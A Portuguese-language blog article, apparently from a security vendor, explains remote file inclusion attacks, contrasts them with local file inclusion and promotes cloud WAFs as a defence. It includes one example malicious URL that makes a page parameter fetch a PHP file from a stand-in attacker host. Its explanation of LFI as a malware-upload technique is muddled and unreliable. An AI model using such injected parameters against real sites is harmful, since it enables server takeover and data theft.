Com o uso de inclusão de arquivo remoto ou remote file inclusion (RFI), um hacker pode fazer com que uma aplicação web inclua um arquivo remoto para fins maliciosos. Embora não seja uma ameaça muito visada pela mídia da área, o ataque RFI tem grande efeito destrutivo, causando desde a divulgação de dados sensíveis e confidenciais até a execução de códigos remotos – provocando o total comprometimento do sistema.
De fato, o RFI pode ser tão nocivo quanto os ataques XSS (cross-site scripting) e SQL Injection – e mira plataformas muito populares como o WordPress. A seguir, saiba mais sobre a ciberameaça e como prevenir e mitigar o problema!
O que é ataque RFI?
O ataque RFI ou inclusão de arquivo remoto é uma ciberameaça que se aproveita da vulnerabilidade de uma aplicação web (a falta de validação da entrada de dados fornecidos pelo usuário) para inserir um arquivo remoto. Para tanto, as aplicações web precisam ser capazes de incluir dinamicamente arquivos ou scripts externos.
Dessa forma, quando o código inserido pelo atacante é executado no servidor web, é possível exercer as ações cibercriminosas.
Aqui, o objetivo dos hackers é explorar a função de referência na aplicação para fazer o upload de malware (código malicioso) a partir de uma URL remota localizada em um domínio diferente. Roubo de dados, comprometimento de servidores e dominação do site para manipulação de conteúdo são consequências comuns de um ataque RFI bem-sucedido.
Ataque RFI: como funciona a inclusão de arquivo remoto?
Para exemplificar, o esquema típico de um ataque RFI funciona da seguinte maneira:
- O cibercriminoso utiliza um motor de buscas ou scanner para detectar um website com componentes vulneráveis;
- Os atacantes se aproveitam da vulnerabilidade RFI (inclusão de arquivo remoto) para fazer o upload de um malware ou código mal-intencionado;
- O site é comprometido com a instalação do malware (páginas são alteradas ou deletadas). Então, o servidor é sequestrado e utilizado como um bot (robô) de DDoS – muitos outros sites são comprometidos. Enfim, os dados são afetados, com roubo de senhas e informações.
Em outras palavras, os atacantes primeiro farão um rastreamento para identificar elementos vulneráveis em um site com base na sua URL. Por exemplo:
www.exemplo.com/index.php?page=PageName
A partir desse dado website, o hacker insere um link que contém um código malicioso, tal como:
www.exemplo.com/index.php?page=http://www.ataque.com/arquivo-malicioso.php
Se o website de fato tiver uma vulnerabilidade RFI, o código malicioso será executado e o link remoto será aberto – com isso, os cibercriminosos podem seguir com o ataque.
Qual a diferença entre ataque RFI e LFI?
Já ouviu falar no LFI ou inclusão de arquivo local (local file inclusion)? Quando o assunto é o ataque RFI, há uma confusão comum entre os dois termos.
Vamos lá: de forma similar ao RFI, o LFI é um vetor que também envolve o upload de arquivos maliciosos para servidores via browsers. Não por acaso, ambos os vetores são frequentemente citados no contexto de ataques de inclusão de arquivos.
Nos dois casos, um ataque bem-sucedido resulta no upload de um malware para o servidor almejado. Entretanto, ao contrário do RFI, o LFI tem como objetivo explorar as funções inseguras de upload de arquivos locais que falham ao validar a entrada controlada pelo usuário.
Com isso, os hackers conseguem enviar o malware diretamente para um servidor comprometido, ao invés de recuperá-lo ao usar uma função de referência externa de um local remoto.
Como prevenir e mitigar o ataque RFI?
Para prevenir o ataque RFI, um primeiro passo básico e essencial é definir regras de validação nos arquivos externos, ou seja, eliminar a vulnerabilidade. Nesse caso, o ideal é não permitir a entrada de arquivos externos no sistema por meio das brechas. Trata-se, portanto, de garantir a validação de todos os arquivos.
É importante ter em mente, no entanto, que esse cuidado não assegura a proteção completa contra a ação hacker. Embora a limpeza de entrada PHP e o correto gerenciamento de arquivos minimizem os riscos do RFI (e sejam de fato necessários), essas práticas, por si sós, não são suficientes.
Vale acrescentar, ainda, que muitas vezes os cibertaques decorrem justamente da sensação de “falsa segurança”, que acaba colocando os sistemas e aplicações das empresas em risco.
Nesse sentido, a defesa mais eficaz contra o ataque RFI e também o LFI são os firewalls que filtram os parâmetros de entrada dos websites contra possíveis inclusões de arquivos. É o caso das soluções de WAF na nuvem, que podem bloquear tentativas maliciosas relacionadas à inserção de arquivos baseadas em tentativas de ataque anteriores, inviabilizando quaisquer futuras ameaças que se originam da mesma fonte.
Existem, ainda, soluções avançadas de WAF na nuvem que também oferecem proteção contra ameaças de dia zero. Para tanto, é utilizado um monitoramento inteligente de tráfego, detectando e bloqueando os ataques antes que eles consigam afetar a aplicação web.
E então, esclareceu suas dúvidas sobre o ataque RFI e seus riscos? Manter-se a par das diferentes ciberameaças é crucial para investir na proteção adequada e manter a integridade dos dados e a continuidade das operações de qualquer negócio.
Para ampliar seus conhecimentos, confira também as características e as melhores defesas contra um dos crimes cibernéticos mais comuns dos dias de hoje – o ataque de engenharia social!
Créditos da imagem de destaque: rawpixel.com
